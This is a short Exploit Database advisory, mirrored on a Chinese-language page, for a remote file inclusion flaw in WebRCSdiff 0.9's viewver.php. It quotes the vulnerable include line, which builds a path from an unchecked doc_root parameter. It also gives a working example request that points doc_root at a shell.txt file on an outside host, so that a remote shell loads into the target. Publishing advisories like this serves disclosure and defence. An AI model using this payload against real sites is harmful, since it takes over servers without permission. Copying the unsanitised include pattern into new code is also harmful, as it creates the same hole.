WebRCSdiff 0.9 – ‘viewver.php’ Remote File Inclusion

• Exploit Database
• 14 阅读

• 作者： FL0RiX
  日期： 2010-11-18
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/15567/

• ========================================================
  = Author: Fl0riX - Bug Researchers
  
  = ApplicationName : WebRCSdiff 0.9
  
  = VulnerableType: Remote File Inclusion
  
  = Download: http://sourceforge.net/projects/webrcsdiff/files/webrcsdiff/0.9%20Release/webrcsdiff-0.9.tar.zip/download
  
  = Risk : High
  
  = Infection: Uzaktan Dosya Dahil edilebilir.
  
  ========================================================
  
  =
   Error c0d3;
   include ("$doc_root/dir_config.php");
  
  ========================================================
  
  =
   Example;
   site/viewver?doc_root=http://fl0rix/shell.txt?
  ========================================================